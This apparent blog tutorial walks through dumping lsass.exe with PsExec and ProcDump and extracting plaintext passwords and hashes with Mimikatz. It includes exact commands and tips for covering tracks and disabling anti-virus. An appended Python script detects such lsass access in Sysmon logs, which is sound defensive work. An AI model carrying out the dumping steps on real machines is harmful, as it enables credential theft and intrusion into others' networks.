Using Microsoft Tools To Dump Password Hashes

Surprisingly, Microsoft supplies the tools that let you dump lsass.exe, and you can then run Mimikatz on the dump file to get a shitload of goodies: tokens, plaintext cached domain credentials, etc.

Download PsExec and ProcDump

Copy both the PsExec and ProcDump zip files to the computer you want to dump lsass from and extract the contents of each zip file.

Open a command prompt and change to the folder where you extracted the PsExec zip file.

Run the command below to escalate from local admin to NT AUTHORITY\SYSTEM.

PSEXEC -i -s -d CMD

You can check that you are now NT AUTHORITY\SYSTEM by running whoami; you should get output like this:

C:\Windows\system32>whoami
nt authority\system

So, as NT AUTHORITY\SYSTEM, navigate to where you extracted ProcDump and run the command below.

procdump -ma lsass.exe lsassdump

(Screenshot: ProcDump output)

Copy the lsassdump.dmp found in your ProcDump directory back to your PC, ready to run Mimikatz on it.

If you're trying to be a little covert, delete any directories and zip files created in the previous steps.

Mimikatz

Download Mimikatz from the author's site.

Extract the contents of the zip file (be careful: anti-virus will pick this up as a virus, so disable it if needed).

Run Mimikatz

Type "sekurlsa::minidump (location of lsassdump.dmp)".

Lastly, type "sekurlsa::logonpasswords".

You can get Mimikatz to write a log file of everything it finds by typing "log" in the Mimikatz console first.

And that is it. Mimikatz will run through the dump file and within a second or so you will get all the tasty clear-text passwords and hashes you required.

Note
I have not been able to run Mimikatz from a Windows 10 PC; will investigate…
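From the blue-team side, the handle ProcDump (or Mimikatz reading lsass directly) opens on lsass.exe is exactly what Sysmon's ProcessAccess event (Event ID 10) records, so it is the natural thing to alert on; with LSA Protection (RunAsPPL) or Credential Guard enabled, an ordinary process, even one running as SYSTEM, is also refused the memory-read access the dump needs in the first place. The script below is an added example, not code from the original post or from any of the tools it names: it assumes Sysmon Event ID 10 has been exported one event per line as Key=Value pairs, and the log lines, the benign-source allowlist and the Finding type are all constructed for the example. It flags any lsass.exe handle granted PROCESS_ALL_ACCESS, PROCESS_VM_READ or PROCESS_DUP_HANDLE from a source image that is not on the allowlist; those three rights are the real winnt.h values.

```python
"""Flag suspicious handle opens on lsass.exe in Sysmon Event ID 10 lines.

Added example, not part of the original post.  Assumes each Sysmon
ProcessAccess event is one line of Key=Value pairs; the sample lines and
the allowlist below are constructed, not captured from a real host.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Process access rights from winnt.h.  A memory dump needs at least VM_READ;
# PROCESS_ALL_ACCESS is what a full-dump tool typically asks for.
PROCESS_VM_READ = 0x0010
PROCESS_DUP_HANDLE = 0x0040
PROCESS_ALL_ACCESS = 0x1FFFFF

# Images that routinely open lsass with read rights on a normal host.
# Constructed allowlist for this example; build your own from a baseline.
BENIGN_SOURCES = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\wbem\wmiprvse.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Key=Value pairs; a value runs until the next "<space>Key=" or end of line,
# so paths containing spaces (e.g. "Program Files") stay intact.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


@dataclass
class Finding:
    source: str
    access: int
    reason: str


def parse_event(line: str) -> dict:
    """Split one Key=Value line into a dict."""
    return {k: v.strip() for k, v in FIELD_RE.findall(line)}


def evaluate(line: str) -> Optional[Finding]:
    """Return a Finding if this line is a suspicious lsass handle open, else None."""
    ev = parse_event(line)
    if ev.get("EventID") != "10":
        return None
    if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return None
    source = ev.get("SourceImage", "").lower()
    access = int(ev.get("GrantedAccess", "0"), 16)
    if access == PROCESS_ALL_ACCESS:
        reason = "PROCESS_ALL_ACCESS on lsass"
    elif access & PROCESS_VM_READ:
        reason = "VM_READ on lsass (enough to read credential material)"
    elif access & PROCESS_DUP_HANDLE:
        reason = "DUP_HANDLE on lsass (handle can be duplicated and read)"
    else:
        return None  # query-only rights: not a dump
    if source in BENIGN_SOURCES:
        return None  # expected reader, suppressed by the allowlist
    return Finding(source=source, access=access, reason=reason)


def scan(lines):
    """Run evaluate() over an iterable of log lines and keep the hits."""
    return [f for f in (evaluate(line) for line in lines) if f]


# Constructed sample events: two benign readers, two that match the tooling
# described on this page, and one unrelated Event ID 1 line.
SAMPLE_LOG = [
    "EventID=10 SourceImage=C:\\Windows\\System32\\svchost.exe "
    "TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1000",
    "EventID=10 SourceImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe "
    "TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1410",
    "EventID=10 SourceImage=C:\\Users\\bob\\Desktop\\procdump.exe "
    "TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1FFFFF",
    "EventID=10 SourceImage=C:\\Temp\\mimikatz.exe "
    "TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1010",
    "EventID=1 Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"ALERT {f.source} access=0x{f.access:X}: {f.reason}")
```

The allowlist is matched on the full lower-cased path, not the file name, so a copy of svchost.exe dropped in a user profile is still flagged; the access-mask check deliberately ignores query-only rights (0x1000 / 0x1400), which ordinary monitoring software requests constantly and which are not enough to read process memory.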